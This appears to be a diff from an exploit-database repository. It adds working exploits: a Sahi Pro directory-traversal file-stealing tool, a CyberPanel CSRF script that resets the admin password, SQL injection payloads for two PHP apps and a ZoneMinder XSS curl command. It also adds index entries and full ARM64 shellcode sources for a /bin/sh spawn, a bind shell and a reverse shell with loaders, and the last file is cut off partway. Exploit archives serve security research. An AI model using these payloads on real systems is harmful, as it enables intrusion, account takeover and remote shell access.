+An issue was discovered in Safi-pro web-application, there is a directory traversal and both local and remote file inclusion vulnerability which resides in the ?script= parameter which is found on the Script_View page. And attacker can send a specially crafted URL to retrieve and steal sensitive files from teh victim.
+
+POC -
+
+http://10.0.0.167:9999/_s_/dyn/Script_view?script=/config/productkey.txt
+
+This results in the revealing of the applications product key. The ?script= can have ../../../../../ added to retrieve more files from the system
+
+POC tool -
+
+import argparse, requests, os
+
+#sahi_productkey = '/config/productkey.txt'
+#root_dir = '../../../../../../'
+#vuln_url = "http://10.0.0.167:9999/_s_/dyn/Script_view?script="
+
+print("[x] Proof of concept tool to exploit the directory traversal and local file"
+      " inclusion vulnerability that resides in the [REDACTED]\n[x] CVE-2019-xxxxxx\n")
+
+print("Example usage:\npython POC.y --url http://example:9999/_s_/dyn/Script_view?script=/config/productkey.txt")
+
+parser = argparse.ArgumentParser()
+parser.add_argument("--url",
+                    help='Specify the vulnerable URL')
+
+args = parser.parse_args()
+
+response = requests.get(args.url)
+file = open("output.txt", "w")
+file.write(response.text)
+file.close()

exploits/multiple/webapps/47063.html

@@ -0,0 +1,22 @@
+# Title: CyberPanel Administrator Account Takeover <= v1.8.4
+# Date: 30.06.2019
+# Author: Bilgi Birikim Sistemleri
+# Vendor Homepage: https://cyberpanel.net/
+# Version: Up to v1.8.4.
+# CVE: CVE-2019-13056
+# mturkyilmaz@bilgibirikim.com & bilgibirikim.com
+
+# Description:
+# Attacker can edit administrator's credentials like email, password.
+# Then, access the administration panel and takeover the server.
+# A CSRF vulnerability.
+
+# How to Reproduce:
+# Attacker will create a website,
+# CyberPanel administrator will visit that website,
+# Administrator's e-mail and password will be changed automatically.
+
+# PoC:
+<script>
+fetch('https://SERVERIP:8090/users/saveModifications', {method: 'POST', credentials: 'include', headers: {'Content-Type': 'text/plain'}, body: '{"accountUsername":"admin","firstName":"CSRF","lastName":"Vulnerable","email":"attackersemail@example.org","password":"attackerspassword"}'});
+</script>

exploits/php/webapps/47045.txt

@@ -0,0 +1,19 @@
+===========================================================================================
+# Exploit Title: WorkSuite PRM 2.4 - 'password' SQL Inj.
+# Dork: N/A
+# Date: 01-05-2019
+# Exploit Author: Mehmet EMİROĞLU
+# Vendor Homepage: https://codecanyon.net/item/worksuite-project-management-system/20052522
+# Software Link: https://codecanyon.net/item/worksuite-project-management-system/20052522
+# Version: v2.4
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: Worksuite is a project management software written in Laravel 5.4 (PHP Framework) which is specifically developed for freelancers and SMEs (Small/Medium sized enterprises). You can manage your company's daily work, your employee's tasks, keep a track on project's progress and much more. It is designed with latest security and code standards.
+===========================================================================================
+# POC - SQLi
+# Parameters : password
+# Attack Pattern : %27 RLIKE (case when  5021001=5021001 then 0x454d49524f474c55 else 0x28 end) and '7917'='7917
+# POST Method :
+http://localhost/worksuite24/public/login^_token=1knO8SR8Erjg56Mza4VaEv1Mb9lj5HiJBPmbTnFx&password=3115065[SQLINJECT HERE]
+===========================================================================================

exploits/php/webapps/47046.txt

@@ -0,0 +1,19 @@
+===========================================================================================
+# Exploit Title: CiuisCRM 1.6 - 'eventType' SQL Inj.
+# Dork: N/A
+# Date: 27-05-2019
+# Exploit Author: Mehmet EMİROĞLU
+# Vendor Homepage: https://codecanyon.net/item/ciuis-crm/20473489
+# Software Link: https://codecanyon.net/item/ciuis-crm/20473489
+# Version: v1.6
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: Ciuis CRM you can easily manage your customer relationships and save time on your business.
+===========================================================================================
+# POC - SQLi
+# Parameters : eventType
+# Attack Pattern :
+-1+or+1%3d1+and(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)
+# POST Method : http://localhost/ciuiscrm-16/calendar/addevent
+===========================================================================================

exploits/php/webapps/47060.txt

@@ -0,0 +1,15 @@
+# Exploit Title: ZoneMinder 1.32.3 - Stored Cross Site Scripting (filters)
+# Google Dork: None
+# Date: 6/29/2019
+# Exploit Author: Joey Lane
+# Vendor Homepage: https://zoneminder.com
+# Software Link: https://github.com/ZoneMinder/zoneminder/releases
+# Version: 1.32.3
+# Tested on: Ubuntu 16.04
+# CVE : Pending
+
+ZoneMinder 1.32.3 contains a stored cross site scripting vulnerability in the 'Filters' page.  The 'Name' field used to create a new filter is not being properly sanitized.  This allows an authenticated user to inject arbitrary javascript code, which will later be executed once a user returns to the Filters page.
+
+The following curl command injects an alert(1) payload into the vulnerable field.  The javascript is executed once a user visits the 'Filters' page.
+
+curl -X POST -H "Content-type: application/x-www-form-urlencoded" -d "Id=&action=Save&object=filter&filter%5BName%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&filter%5BQuery%5D%5Bterms%5D%5B0%5D%5Battr%5D=MonitorId&filter%5BQuery%5D%5Bterms%5D%5B0%5D%5Bop%5D=%3D&filter%5BQuery%5D%5Bterms%5D%5B0%5D%5Bval%5D=1&filter%5BQuery%5D%5Bsort_field%5D=Id&filter%5BQuery%5D%5Bsort_asc%5D=1&filter%5BQuery%5D%5Blimit%5D=100&filter%5BAutoExecuteCmd%5D=0&filter%5BAutoMoveTo%5D=&Save=Save" --cookie "zmSkin=classic; zmCSS=classic; ZMSESSID=(A VALID SESSION ID)" http://(A VALID HOST)/zm/index.php?view=filter&sort_field=StartTime&sort_asc=1

files_exploits.csv

@@ -17515,6 +17515,8 @@ id,file,description,date,author,type,platform,port
 47030,exploits/multiple/remote/47030.py,"SuperDoctor5 - 'NRPE' Remote Code Execution",2019-06-25,"Simon Gurney",remote,multiple,
 47031,exploits/hardware/remote/47031.py,"SAPIDO RB-1732 - Remote Command Execution",2019-06-25,k1nm3n.aotoi,remote,hardware,
 47039,exploits/linux/remote/47039.rb,"Nagios XI 5.5.6 - Magpie_debug.php Root Remote Code Execution (Metasploit)",2019-06-26,Metasploit,remote,linux,
+47047,exploits/linux/remote/47047.rb,"Linux Mint 18.3-19.1 - 'yelp' Command Injection",2019-07-01,b1ack0wl,remote,linux,
+47067,exploits/hardware/remote/47067.py,"FaceSentry Access Control System 6.4.8 - Remote SSH Root",2019-07-01,LiquidWorm,remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41439,3 +41441,14 @@ id,file,description,date,author,type,platform,port
 47036,exploits/php/webapps/47036.txt,"WordPress Plugin iLive 1.0.4 - Cross-Site Scripting",2019-06-25,m0ze,webapps,php,
 47037,exploits/php/webapps/47037.txt,"WordPress Plugin Live Chat Unlimited  2.8.3 - Cross-Site Scripting",2019-06-25,m0ze,webapps,php,
 47044,exploits/php/webapps/47044.py,"LibreNMS 1.46 - 'addhost' Remote Code Execution",2019-06-28,Askar,webapps,php,80
+47045,exploits/php/webapps/47045.txt,"WorkSuite PRM 2.4 - 'password' SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,php,
+47046,exploits/php/webapps/47046.txt,"CiuisCRM 1.6 - 'eventType' SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,php,
+47058,exploits/multiple/webapps/47058.txt,"Varient 1.6.1 - SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,multiple,
+47059,exploits/linux/webapps/47059.txt,"PowerPanel Business Edition - Cross-Site Scripting",2019-07-01,"Joey Lane",webapps,linux,
+47060,exploits/php/webapps/47060.txt,"ZoneMinder 1.32.3 - Cross-Site Scripting",2019-07-01,"Joey Lane",webapps,php,
+47061,exploits/multiple/webapps/47061.txt,"SAP Crystal Reports - Information Disclosure",2019-07-01,"Mohamed M.Fouad",webapps,multiple,
+47062,exploits/multiple/webapps/47062.py,"Sahi pro 8.x - Directory Traversal",2019-07-01,"Alexander Bluestein",webapps,multiple,
+47063,exploits/multiple/webapps/47063.html,"CyberPanel 1.8.4 - Cross-Site Request Forgery",2019-07-01,"Bilgi Birikim Sistemleri",webapps,multiple,
+47064,exploits/hardware/webapps/47064.txt,"FaceSentry Access Control System 6.4.8 - Remote Command Injection",2019-07-01,LiquidWorm,webapps,hardware,
+47065,exploits/hardware/webapps/47065.txt,"FaceSentry Access Control System 6.4.8 - Cross-Site Request Forgery",2019-07-01,LiquidWorm,webapps,hardware,
+47066,exploits/hardware/webapps/47066.py,"FaceSentry Access Control System 6.4.8 - Remote Root Exploit",2019-07-01,LiquidWorm,webapps,hardware,

files_shellcodes.csv

@@ -976,3 +976,14 @@ id,file,description,date,author,type,platform
 47041,shellcodes/windows_x86/47041.c,"Windows/x86 - bitsadmin Download and Execute (http://192.168.10.10/evil.exe _c:\evil.exe_) Shellcode (210 Bytes)",2019-06-27,"Joseph McDonagh",shellcode,windows_x86
 47042,shellcodes/windows_x86/47042.c,"Windows/x86 - Start iexplore.exe (http://192.168.10.10/) Shellcode (191 Bytes)",2019-06-28,"Joseph McDonagh",shellcode,windows_x86
 47043,shellcodes/linux_x86/47043.c,"Linux/x86 - Chmod + Execute (/usr/bin/wget http://192.168.1.93//x) + Hide Output Shellcode (129 bytes)",2019-06-28,LockedByte,shellcode,linux_x86
+47048,shellcodes/arm/47048.c,"Linux/ARM64 - execve(_/bin/sh__ NULL_ NULL) Shellcode (40 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
+47049,shellcodes/arm/47049.c,"Linux/ARM64 - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (164 bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
+47050,shellcodes/arm/47050.c,"Linux/ARM64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (128 bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
+47051,shellcodes/arm/47051.c,"Linux/ARM64 - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (176 bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
+47052,shellcodes/arm/47052.c,"Linux/ARM64 - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (140 bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
+47053,shellcodes/arm/47053.c,"Linux/ARM64 - Read /etc/passwd Shellcode (120 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
+47054,shellcodes/arm/47054.c,"Linux/ARM64 - Egghunter (PWN!PWN!) + execve(_/bin/sh__ NULL_ NULL) + mprotect() Shellcode (88 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
+47055,shellcodes/arm/47055.c,"Linux/ARM64 - mmap() + read() stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (60 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
+47056,shellcodes/arm/47056.c,"Linux/ARM64 - Jump Back Shellcode + execve(_/bin/sh__ NULL_ NULL) Shellcode (8 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
+47057,shellcodes/arm/47057.c,"Linux/ARM64 - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode (48 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
+47068,shellcodes/linux_x86/47068.c,"Linux/x86 - execve /bin/sh using JMP-CALL-POP Shellcode (21 bytes)",2019-07-01,kiriknik,shellcode,linux_x86

shellcodes/arm/47048.c

@@ -0,0 +1,89 @@
+/*
+# Title:  Linux/ARM64 - execve("/bin/sh", NULL, NULL) Shellcode (40 Bytes)
+# Date:   2019-06-30
+# Tested: Ubuntu 16.04 (aarch64)
+# Author: Ken Kitahara
+# Compilation: gcc -o loader loader.c
+
+
+ubuntu@ubuntu:~/works$ lsb_release -a
+No LSB modules are available.
+Distributor ID:	Ubuntu
+Description:	Ubuntu Xenial Xerus (development branch)
+Release:	16.04
+Codename:	xenial
+ubuntu@ubuntu:~/works$ uname -a
+Linux ubuntu 4.2.0-16-generic #19-Ubuntu SMP Thu Oct 8 15:00:45 UTC 2015 aarch64 aarch64 aarch64 GNU/Linux
+ubuntu@ubuntu:~/works$ cat execve.s
+.section .text
+.global _start
+_start:
+    // execve("/bin/sh", NULL, NULL)
+    mov  x1, #0x622F            // x1 = 0x000000000000622F ("b/")
+    movk x1, #0x6E69, lsl #16   // x1 = 0x000000006E69622F ("nib/")
+    movk x1, #0x732F, lsl #32   // x1 = 0x0000732F6E69622F ("s/nib/")
+    movk x1, #0x68, lsl #48     // x1 = 0x0068732F6E69622F ("hs/nib/")
+    str  x1, [sp, #-8]!         // push x1
+    mov  x1, xzr                // args[1] = NULL
+    mov  x2, xzr                // args[2] = NULL
+    add  x0, sp, x1             // args[0] = pointer to "/bin/sh\0"
+    mov  x8, #221               // Systemcall Number = 221 (execve)
+    svc  #0x1337                // Invoke Systemcall
+ubuntu@ubuntu:~/works$ as -o execve.o execve.s && ld -o execve execve.o
+ubuntu@ubuntu:~/works$ ./execve 
+$ id
+uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),107(netdev)
+$ exit
+ubuntu@ubuntu:~/works$ objdump -d ./execve
+
+./execve:     file format elf64-littleaarch64
+
+
+Disassembly of section .text:
+
+0000000000400078 <_start>:
+  400078:	d28c45e1 	mov	x1, #0x622f                	// #25135
+  40007c:	f2adcd21 	movk	x1, #0x6e69, lsl #16
+  400080:	f2ce65e1 	movk	x1, #0x732f, lsl #32
+  400084:	f2e00d01 	movk	x1, #0x68, lsl #48
+  400088:	f81f8fe1 	str	x1, [sp,#-8]!
+  40008c:	aa1f03e1 	mov	x1, xzr
+  400090:	aa1f03e2 	mov	x2, xzr
+  400094:	8b2163e0 	add	x0, sp, x1
+  400098:	d2801ba8 	mov	x8, #0xdd                  	// #221
+  40009c:	d40266e1 	svc	#0x1337
+ubuntu@ubuntu:~/works$ objcopy -O binary execve execve.bin
+ubuntu@ubuntu:~/works$ hexdump -v -e '"\\""x" 1/1 "%02x" ""' execve.bin && echo
+\xe1\x45\x8c\xd2\x21\xcd\xad\xf2\xe1\x65\xce\xf2\x01\x0d\xe0\xf2\xe1\x8f\x1f\xf8\xe1\x03\x1f\xaa\xe2\x03\x1f\xaa\xe0\x63\x21\x8b\xa8\x1b\x80\xd2\xe1\x66\x02\xd4
+
+*/
+
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+int (*sc)();
+
+char shellcode[] =
+"\xe1\x45\x8c\xd2\x21\xcd\xad\xf2\xe1\x65\xce\xf2\x01\x0d\xe0\xf2"
+"\xe1\x8f\x1f\xf8\xe1\x03\x1f\xaa\xe2\x03\x1f\xaa\xe0\x63\x21\x8b"
+"\xa8\x1b\x80\xd2\xe1\x66\x02\xd4";
+
+int main(int argc, char **argv) {
+    printf("Shellcode Length: %zd Bytes\n", strlen(shellcode));
+
+    void *ptr = mmap(0, 0x100, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+
+    if (ptr == MAP_FAILED) {
+        perror("mmap");
+        exit(-1);
+    }
+
+    memcpy(ptr, shellcode, sizeof(shellcode));
+    sc = ptr;
+
+    sc();
+
+    return 0;
+}

shellcodes/arm/47049.c

@@ -0,0 +1,175 @@
+/*
+# Title:  Linux/ARM64 - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (164 bytes)
+# Date:   2019-06-30
+# Tested: Ubuntu 16.04 (aarch64)
+# Author: Ken Kitahara
+# Compilation: gcc -o loader loader.c
+
+
+ubuntu@ubuntu:~/works$ lsb_release -a
+No LSB modules are available.
+Distributor ID:	Ubuntu
+Description:	Ubuntu Xenial Xerus (development branch)
+Release:	16.04
+Codename:	xenial
+ubuntu@ubuntu:~/works$ uname -a
+Linux ubuntu 4.2.0-16-generic #19-Ubuntu SMP Thu Oct 8 15:00:45 UTC 2015 aarch64 aarch64 aarch64 GNU/Linux
+ubuntu@ubuntu:~/works$ cat bindshell.s
+.section .text
+.global _start
+_start:
+    // s = socket(2, 1, 0)
+    mov  x8, #198
+    lsr  x1, x8, #7
+    lsl  x0, x1, #1
+    mov  x2, xzr
+    svc  #0x1337
+
+    // save s
+    mvn  x4, x0
+
+    // bind(s, &sockaddr, 16)
+    lsl  x1, x1, #1
+    movk x1, #0x5C11, lsl #16
+    str  x1, [sp, #-8]!
+    add  x1, sp, x2
+    mov  x2, #16
+    mov  x8, #200
+    svc  #0x1337
+
+    // listen(s, 2)
+    mvn  x0, x4
+    lsr  x1, x2, #3
+    mov  x8, #201
+    svc  #0x1337
+    mov  x5, x1
+
+    // a = accept(s, 0, 0)
+    mvn  x0, x4
+    mov  x1, xzr
+    mov  x2, xzr
+    mov  x8, #202
+    svc  #0x1337
+
+    // save a
+    mvn  x4, x0
+
+    lsl  x1, x5, #1
+
+dup3:
+    // dup3(s, 2, 0)
+    // dup3(s, 1, 0)
+    // dup3(s, 0, 0)
+    mvn  x0, x4
+    lsr  x1, x1, #1
+    mov  x2, xzr
+    mov  x8, #24
+    svc  #0x1337
+    mov  x10, xzr
+    cmp  x10, x1
+    bne  dup3
+
+    // execve("/bin/sh", 0, 0)
+    mov  x3, #0x622F
+    movk x3, #0x6E69, lsl #16
+    movk x3, #0x732F, lsl #32
+    movk x3, #0x68, lsl #48
+    str  x3, [sp, #-8]!
+    add  x0, sp, x1
+    mov  x8, #221
+    svc  #0x1337
+ubuntu@ubuntu:~/works$ as -o bindshell.o bindshell.s && ld -o bindshell bindshell.o
+ubuntu@ubuntu:~/works$ objdump -d ./bindshell
+
+./bindshell:     file format elf64-littleaarch64
+
+
+Disassembly of section .text:
+
+0000000000400078 <_start>:
+  400078:	d28018c8 	mov	x8, #0xc6                  	// #198
+  40007c:	d347fd01 	lsr	x1, x8, #7
+  400080:	d37ff820 	lsl	x0, x1, #1
+  400084:	aa1f03e2 	mov	x2, xzr
+  400088:	d40266e1 	svc	#0x1337
+  40008c:	aa2003e4 	mvn	x4, x0
+  400090:	d37ff821 	lsl	x1, x1, #1
+  400094:	f2ab8221 	movk	x1, #0x5c11, lsl #16
+  400098:	f81f8fe1 	str	x1, [sp,#-8]!
+  40009c:	8b2263e1 	add	x1, sp, x2
+  4000a0:	d2800202 	mov	x2, #0x10                  	// #16
+  4000a4:	d2801908 	mov	x8, #0xc8                  	// #200
+  4000a8:	d40266e1 	svc	#0x1337
+  4000ac:	aa2403e0 	mvn	x0, x4
+  4000b0:	d343fc41 	lsr	x1, x2, #3
+  4000b4:	d2801928 	mov	x8, #0xc9                  	// #201
+  4000b8:	d40266e1 	svc	#0x1337
+  4000bc:	aa0103e5 	mov	x5, x1
+  4000c0:	aa2403e0 	mvn	x0, x4
+  4000c4:	aa1f03e1 	mov	x1, xzr
+  4000c8:	aa1f03e2 	mov	x2, xzr
+  4000cc:	d2801948 	mov	x8, #0xca                  	// #202
+  4000d0:	d40266e1 	svc	#0x1337
+  4000d4:	aa2003e4 	mvn	x4, x0
+  4000d8:	d37ff8a1 	lsl	x1, x5, #1
+
+00000000004000dc <dup3>:
+  4000dc:	aa2403e0 	mvn	x0, x4
+  4000e0:	d341fc21 	lsr	x1, x1, #1
+  4000e4:	aa1f03e2 	mov	x2, xzr
+  4000e8:	d2800308 	mov	x8, #0x18                  	// #24
+  4000ec:	d40266e1 	svc	#0x1337
+  4000f0:	aa1f03ea 	mov	x10, xzr
+  4000f4:	eb01015f 	cmp	x10, x1
+  4000f8:	54ffff21 	b.ne	4000dc <dup3>
+  4000fc:	d28c45e3 	mov	x3, #0x622f                	// #25135
+  400100:	f2adcd23 	movk	x3, #0x6e69, lsl #16
+  400104:	f2ce65e3 	movk	x3, #0x732f, lsl #32
+  400108:	f2e00d03 	movk	x3, #0x68, lsl #48
+  40010c:	f81f8fe3 	str	x3, [sp,#-8]!
+  400110:	8b2163e0 	add	x0, sp, x1
+  400114:	d2801ba8 	mov	x8, #0xdd                  	// #221
+  400118:	d40266e1 	svc	#0x1337
+ubuntu@ubuntu:~/works$ objcopy -O binary bindshell bindshell.bin
+ubuntu@ubuntu:~/works$ hexdump -v -e '"\\""x" 1/1 "%02x" ""' bindshell.bin && echo
+\xc8\x18\x80\xd2\x01\xfd\x47\xd3\x20\xf8\x7f\xd3\xe2\x03\x1f\xaa\xe1\x66\x02\xd4\xe4\x03\x20\xaa\x21\xf8\x7f\xd3\x21\x82\xab\xf2\xe1\x8f\x1f\xf8\xe1\x63\x22\x8b\x02\x02\x80\xd2\x08\x19\x80\xd2\xe1\x66\x02\xd4\xe0\x03\x24\xaa\x41\xfc\x43\xd3\x28\x19\x80\xd2\xe1\x66\x02\xd4\xe5\x03\x01\xaa\xe0\x03\x24\xaa\xe1\x03\x1f\xaa\xe2\x03\x1f\xaa\x48\x19\x80\xd2\xe1\x66\x02\xd4\xe4\x03\x20\xaa\xa1\xf8\x7f\xd3\xe0\x03\x24\xaa\x21\xfc\x41\xd3\xe2\x03\x1f\xaa\x08\x03\x80\xd2\xe1\x66\x02\xd4\xea\x03\x1f\xaa\x5f\x01\x01\xeb\x21\xff\xff\x54\xe3\x45\x8c\xd2\x23\xcd\xad\xf2\xe3\x65\xce\xf2\x03\x0d\xe0\xf2\xe3\x8f\x1f\xf8\xe0\x63\x21\x8b\xa8\x1b\x80\xd2\xe1\x66\x02\xd4
+
+*/
+
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+int (*sc)();
+
+char shellcode[] =
+"\xc8\x18\x80\xd2\x01\xfd\x47\xd3\x20\xf8\x7f\xd3\xe2\x03\x1f\xaa"
+"\xe1\x66\x02\xd4\xe4\x03\x20\xaa\x21\xf8\x7f\xd3\x21\x82\xab\xf2"
+"\xe1\x8f\x1f\xf8\xe1\x63\x22\x8b\x02\x02\x80\xd2\x08\x19\x80\xd2"
+"\xe1\x66\x02\xd4\xe0\x03\x24\xaa\x41\xfc\x43\xd3\x28\x19\x80\xd2"
+"\xe1\x66\x02\xd4\xe5\x03\x01\xaa\xe0\x03\x24\xaa\xe1\x03\x1f\xaa"
+"\xe2\x03\x1f\xaa\x48\x19\x80\xd2\xe1\x66\x02\xd4\xe4\x03\x20\xaa"
+"\xa1\xf8\x7f\xd3\xe0\x03\x24\xaa\x21\xfc\x41\xd3\xe2\x03\x1f\xaa"
+"\x08\x03\x80\xd2\xe1\x66\x02\xd4\xea\x03\x1f\xaa\x5f\x01\x01\xeb"
+"\x21\xff\xff\x54\xe3\x45\x8c\xd2\x23\xcd\xad\xf2\xe3\x65\xce\xf2"
+"\x03\x0d\xe0\xf2\xe3\x8f\x1f\xf8\xe0\x63\x21\x8b\xa8\x1b\x80\xd2"
+"\xe1\x66\x02\xd4";
+
+int main(int argc, char **argv) {
+    printf("Shellcode Length: %zd Bytes\n", strlen(shellcode));
+
+    void *ptr = mmap(0, 0x100, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+
+    if (ptr == MAP_FAILED) {
+        perror("mmap");
+        exit(-1);
+    }
+
+    memcpy(ptr, shellcode, sizeof(shellcode));
+    sc = ptr;
+
+    sc();
+
+    return 0;
+}

shellcodes/arm/47050.c

@@ -0,0 +1,148 @@
+/*
+# Title:  Linux/ARM64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (128 bytes)
+# Date:   2019-06-30
+# Tested: Ubuntu 16.04 (aarch64)
+# Author: Ken Kitahara
+# Compilation: gcc -o loader loader.c
+
+
+ubuntu@ubuntu:~/works$ lsb_release -a
+No LSB modules are available.
+Distributor ID:	Ubuntu
+Description:	Ubuntu Xenial Xerus (development branch)
+Release:	16.04
+Codename:	xenial
+ubuntu@ubuntu:~/works$ uname -a
+Linux ubuntu 4.2.0-16-generic #19-Ubuntu SMP Thu Oct 8 15:00:45 UTC 2015 aarch64 aarch64 aarch64 GNU/Linux
+ubuntu@ubuntu:~/works$ cat revshell.s
+.section .text
+.global _start
+_start:
+    // s = socket(2, 1, 0)
+    mov  x8, #198
+    lsr  x1, x8, #7
+    lsl  x0, x1, #1
+    mov  x2, xzr
+    svc  #0x1337
+
+    // save s
+    mvn  x4, x0
+
+    // connect(s, &sockaddr, 16)
+    lsl  x1, x1, #1
+    movk x1, #0x5C11, lsl #16
+    movk x1, #0x7F, lsl #32
+    movk x1, #0x0100, lsl #48
+    str  x1, [sp, #-8]!
+    add  x1, sp, x2
+    mov  x2, #16
+    mov  x8, #203
+    svc  #0x1337
+
+    lsr  x1, x2, #2
+
+dup3:
+    // dup3(s, 2, 0)
+    // dup3(s, 1, 0)
+    // dup3(s, 0, 0)
+    mvn  x0, x4
+    lsr  x1, x1, #1
+    mov  x2, xzr
+    mov  x8, #24
+    svc  #0x1337
+    mov  x10, xzr
+    cmp  x10, x1
+    bne  dup3
+
+    // execve("/bin/sh", 0, 0)
+    mov  x3, #0x622F
+    movk x3, #0x6E69, lsl #16
+    movk x3, #0x732F, lsl #32
+    movk x3, #0x68, lsl #48
+    str  x3, [sp, #-8]!
+    add  x0, sp, x1
+    mov  x8, #221
+    svc  #0x1337
+ubuntu@ubuntu:~/works$ as -o revshell.o revshell.s && ld -o revshell revshell.o
+ubuntu@ubuntu:~/works$ objdump -d ./revshell
+
+./revshell:     file format elf64-littleaarch64
+
+
+Disassembly of section .text:
+
+0000000000400078 <_start>:
+  400078:	d28018c8 	mov	x8, #0xc6                  	// #198
+  40007c:	d347fd01 	lsr	x1, x8, #7
+  400080:	d37ff820 	lsl	x0, x1, #1
+  400084:	aa1f03e2 	mov	x2, xzr
+  400088:	d40266e1 	svc	#0x1337
+  40008c:	aa2003e4 	mvn	x4, x0
+  400090:	d37ff821 	lsl	x1, x1, #1
+  400094:	f2ab8221 	movk	x1, #0x5c11, lsl #16
+  400098:	f2c00fe1 	movk	x1, #0x7f, lsl #32
+  40009c:	f2e02001 	movk	x1, #0x100, lsl #48
+  4000a0:	f81f8fe1 	str	x1, [sp,#-8]!
+  4000a4:	8b2263e1 	add	x1, sp, x2
+  4000a8:	d2800202 	mov	x2, #0x10                  	// #16
+  4000ac:	d2801968 	mov	x8, #0xcb                  	// #203
+  4000b0:	d40266e1 	svc	#0x1337
+  4000b4:	d342fc41 	lsr	x1, x2, #2
+
+00000000004000b8 <dup3>:
+  4000b8:	aa2403e0 	mvn	x0, x4
+  4000bc:	d341fc21 	lsr	x1, x1, #1
+  4000c0:	aa1f03e2 	mov	x2, xzr
+  4000c4:	d2800308 	mov	x8, #0x18                  	// #24
+  4000c8:	d40266e1 	svc	#0x1337
+  4000cc:	aa1f03ea 	mov	x10, xzr
+  4000d0:	eb01015f 	cmp	x10, x1
+  4000d4:	54ffff21 	b.ne	4000b8 <dup3>
+  4000d8:	d28c45e3 	mov	x3, #0x622f                	// #25135
+  4000dc:	f2adcd23 	movk	x3, #0x6e69, lsl #16
+  4000e0:	f2ce65e3 	movk	x3, #0x732f, lsl #32
+  4000e4:	f2e00d03 	movk	x3, #0x68, lsl #48
+  4000e8:	f81f8fe3 	str	x3, [sp,#-8]!
+  4000ec:	8b2163e0 	add	x0, sp, x1
+  4000f0:	d2801ba8 	mov	x8, #0xdd                  	// #221
+  4000f4:	d40266e1 	svc	#0x1337
+ubuntu@ubuntu:~/works$ objcopy -O binary revshell revshell.bin
+ubuntu@ubuntu:~/works$ hexdump -v -e '"\\""x" 1/1 "%02x" ""' revshell.bin && echo
+\xc8\x18\x80\xd2\x01\xfd\x47\xd3\x20\xf8\x7f\xd3\xe2\x03\x1f\xaa\xe1\x66\x02\xd4\xe4\x03\x20\xaa\x21\xf8\x7f\xd3\x21\x82\xab\xf2\xe1\x0f\xc0\xf2\x01\x20\xe0\xf2\xe1\x8f\x1f\xf8\xe1\x63\x22\x8b\x02\x02\x80\xd2\x68\x19\x80\xd2\xe1\x66\x02\xd4\x41\xfc\x42\xd3\xe0\x03\x24\xaa\x21\xfc\x41\xd3\xe2\x03\x1f\xaa\x08\x03\x80\xd2\xe1\x66\x02\xd4\xea\x03\x1f\xaa\x5f\x01\x01\xeb\x21\xff\xff\x54\xe3\x45\x8c\xd2\x23\xcd\xad\xf2\xe3\x65\xce\xf2\x03\x0d\xe0\xf2\xe3\x8f\x1f\xf8\xe0\x63\x21\x8b\xa8\x1b\x80\xd2\xe1\x66\x02\xd4
+
+*/
+
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+int (*sc)();
+
+char shellcode[] =
+"\xc8\x18\x80\xd2\x01\xfd\x47\xd3\x20\xf8\x7f\xd3\xe2\x03\x1f\xaa"
+"\xe1\x66\x02\xd4\xe4\x03\x20\xaa\x21\xf8\x7f\xd3\x21\x82\xab\xf2"
+"\xe1\x0f\xc0\xf2\x01\x20\xe0\xf2\xe1\x8f\x1f\xf8\xe1\x63\x22\x8b"
+"\x02\x02\x80\xd2\x68\x19\x80\xd2\xe1\x66\x02\xd4\x41\xfc\x42\xd3"
+"\xe0\x03\x24\xaa\x21\xfc\x41\xd3\xe2\x03\x1f\xaa\x08\x03\x80\xd2"
+"\xe1\x66\x02\xd4\xea\x03\x1f\xaa\x5f\x01\x01\xeb\x21\xff\xff\x54"
